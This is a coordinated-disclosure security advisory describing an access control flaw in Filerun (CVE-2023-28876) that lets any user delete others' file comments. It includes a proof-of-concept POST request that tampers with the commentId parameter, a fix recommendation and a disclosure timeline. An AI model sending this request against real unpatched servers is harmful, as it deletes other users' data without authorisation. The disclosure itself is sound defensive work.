usd-2022-0010 | Broken Access Control in Filerun (Update 20220202)

Advisory ID: usd-2022-0010
Product: Filerun
Affected Version: <= Update 20220202
Vulnerability Type: CWE-284: Improper Access Control
Security Risk: Medium
Vendor URL: https://filerun.com
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2023-28876
CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2023-28876

Introduction

Filerun allows users to place comments on their uploaded files. Due to improper access control, any user can delete comments on files.

Proof of Concept

In the following, an exemplary request to delete a comment is given:

POST /?module=comments&section=ajax&page=remove HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 115
Cookie: FileRunSID=[REDACTED]
[...]

commentId=4&path=%2FROOT%2FHOME%2Fexample.txt&csrf=[REDACTED]

By setting the parameter commentId a user can delete any comment, even if the user does not own it.

Fix

It is recommended to restrict access to sensitive functions or information by default. Required access privileges should be granted explicitly by a global access control mechanism. Only allow required users to remove comments (e.g. file owner and shared users).

References

Timeline

2022-04-22: Vulnerability identified by Christian Pöschl
2022-04-25: First contact request via info@filerun.com
2022-04-29: Vulnerability details submitted to Vendor
2022-05-10: Fixed by Vendor
2022-10-31: This advisory is published

Credits

This security vulnerability was found by Christian Pöschl of usd AG.

usd-2022-0010 | Broken Access Control in Filerun (Update 20220202)

Introduction

Proof of Concept

Fix

References

Timeline

Credits

About usd Security Advisories

Disclaimer

usd HeroLab

LabNews

Security Advisories zu SONIX und SAP

The Surprising Complexity of Finding Known Vulnerabilities

Security Advisories zu Zimperium und FileCloud

Folgen Sie uns